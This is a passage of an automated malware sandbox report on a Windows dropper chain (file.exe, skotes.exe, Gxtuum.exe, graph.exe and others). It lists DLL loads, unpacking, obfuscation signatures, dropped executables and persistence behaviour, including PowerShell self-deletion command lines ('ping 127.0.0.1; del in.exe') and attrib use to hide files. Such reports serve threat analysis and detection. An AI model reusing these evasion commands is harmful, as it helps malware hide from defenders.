Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Section loaded: winrnr.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Google\Chrome\Extensions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\graph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\graph\graph.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: file.exe Static file information: File size 3289088 > 1048576
Source: file.exe Static PE information: Raw size of jlvlbxwn is bigger than: 0x100000 < 0x2b7000
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 6eea3e30e9.exe, 0000000C.00000003.2674626766.00000247A0680000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000E.00000002.2987242704.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000000E.00000000.2674897514.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000000.2698018122.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000002.2986807118.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000002.2986951366.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000000.2766666306.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000002.2987477077.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000000.2848079975.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 6eea3e30e9.exe, 0000000C.00000002.2716799079.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000C.00000000.2570471769.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000002.2738064179.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000000.2577423521.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 6eea3e30e9.exe, 0000000C.00000002.2716799079.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000C.00000000.2570471769.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000002.2738064179.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000000.2577423521.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000006.00000002.2990887486.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, random[2].exe1.6.dr
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000006.00000002.2990887486.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, random[2].exe1.6.dr
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 6eea3e30e9.exe, 0000000C.00000003.2674626766.00000247A0680000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000E.00000002.2987242704.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000000E.00000000.2674897514.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000000.2698018122.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000010.00000002.2986807118.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000002.2986951366.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 00000026.00000000.2766666306.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000002.2987477077.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp, graph.exe, 0000002E.00000000.2848079975.00007FF7EDAB9000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.360000.0.unpack :EW;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.360000.0.unpack :EW;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.360000.0.unpack :EW;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jlvlbxwn:EW;hiserdkf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Unpacked PE file: 7.2.0516ff61af.exe.ae0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Unpacked PE file: 45.2.1b73492cb0.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jxwvjkbl:EW;srccaxxk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jxwvjkbl:EW;srccaxxk:EW;.taggant:EW;
Suspicious powershell command line found
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Binary contains a suspicious time stamp
Source: random[2].exe1.6.dr Static PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: random[2].exe0.6.dr Static PE information: real checksum: 0x1a555c should be: 0x15e8ab
Source: 1b73492cb0.exe.6.dr Static PE information: real checksum: 0x453b96 should be: 0x44b967
Source: 6eea3e30e9.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: Intel_PTT_EK_Recertification.exe.29.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: ed15fdf974.exe.6.dr Static PE information: real checksum: 0x1a555c should be: 0x15e8ab
Source: graph.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x46f82
Source: random[2].exe1.6.dr Static PE information: real checksum: 0x0 should be: 0x14b59
Source: Gxtuum.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: file.exe Static PE information: real checksum: 0x3327da should be: 0x328505
Source: 0516ff61af.exe.6.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: 7z.exe.15.dr Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: skotes.exe.0.dr Static PE information: real checksum: 0x3327da should be: 0x328505
Source: abcebc1047.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: 7z.dll.15.dr Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: in.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: random[2].exe.6.dr Static PE information: real checksum: 0x453b96 should be: 0x44b967
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: jlvlbxwn
Source: file.exe Static PE information: section name: hiserdkf
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: jlvlbxwn
Source: skotes.exe.0.dr Static PE information: section name: hiserdkf
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: wekcazbo
Source: random[1].exe.6.dr Static PE information: section name: ttllozcv
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 0516ff61af.exe.6.dr Static PE information: section name:
Source: 0516ff61af.exe.6.dr Static PE information: section name: .idata
Source: 0516ff61af.exe.6.dr Static PE information: section name:
Source: 0516ff61af.exe.6.dr Static PE information: section name: wekcazbo
Source: 0516ff61af.exe.6.dr Static PE information: section name: ttllozcv
Source: 0516ff61af.exe.6.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: jxwvjkbl
Source: random[2].exe.6.dr Static PE information: section name: srccaxxk
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: 1b73492cb0.exe.6.dr Static PE information: section name:
Source: 1b73492cb0.exe.6.dr Static PE information: section name: .idata
Source: 1b73492cb0.exe.6.dr Static PE information: section name:
Source: 1b73492cb0.exe.6.dr Static PE information: section name: jxwvjkbl
Source: 1b73492cb0.exe.6.dr Static PE information: section name: srccaxxk
Source: 1b73492cb0.exe.6.dr Static PE information: section name: .taggant
Source: random[2].exe0.6.dr Static PE information: section name: .eh_fram
Source: ed15fdf974.exe.6.dr Static PE information: section name: .eh_fram
Source: in.exe.27.dr Static PE information: section name: UPX2
Source: Intel_PTT_EK_Recertification.exe.29.dr Static PE information: section name: UPX2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DBD91C push ecx; ret 0_2_00DBD92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DB1359 push es; ret 0_2_00DB135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0037D91C push ecx; ret 1_2_0037D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0037D91C push ecx; ret 2_2_0037D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003B00FB push es; ret 6_2_003B00FE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003B00F3 push es; ret 6_2_003B00F6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003B00F7 push es; ret 6_2_003B00FA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003B00EF push es; ret 6_2_003B00F2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0037D91C push ecx; ret 6_2_0037D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0039DEDB push ss; iretd 6_2_0039DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0037DFC6 push ecx; ret 6_2_0037DFD9
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0144755D push esp; retf 7_3_0144755E
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140F5C0 push esi; retf 7_3_0140F5C3
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140F5C0 push esi; retf 7_3_0140F5C3
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_01410DDA push ss; iretd 7_3_01410DF8
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_01410DDA push ss; iretd 7_3_01410DF8
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140CF99 push eax; iretd 7_3_0140CFA1
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140CF99 push eax; iretd 7_3_0140CFA1
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_014159B4 push esi; retf 7_3_014159B7
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_014159B4 push esi; retf 7_3_014159B7
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0141766C push esi; retf 7_3_0141766F
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0141766C push esi; retf 7_3_0141766F
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140ECC8 push edi; retf 7_3_0140ECC9
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140ECC8 push edi; retf 7_3_0140ECC9
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_01411EEA push ss; iretd 7_3_01411F08
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_01411EEA push ss; iretd 7_3_01411F08
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_013F1430 pushfd ; iretd 7_3_013F1435
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_013F079A pushad ; retf 7_3_013F07A5
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_013F48F7 push cs; iretd 7_3_013F48F8
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_013F0C74 push esp; retf 7_3_013F0C79
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Code function: 7_3_0140F5C0 push esi; retf 7_3_0140F5C3
Source: file.exe Static PE information: section name: entropy: 7.041161231941029
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.041161231941029
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.980952558000639
Source: random[1].exe.6.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: 0516ff61af.exe.6.dr Static PE information: section name: entropy: 7.980952558000639
Source: 0516ff61af.exe.6.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: random[2].exe.6.dr Static PE information: section name: jxwvjkbl entropy: 7.95639104921717
Source: 1b73492cb0.exe.6.dr Static PE information: section name: jxwvjkbl entropy: 7.95639104921717
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Creates files in the system32 config directory
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\main\in.exe File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe File created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
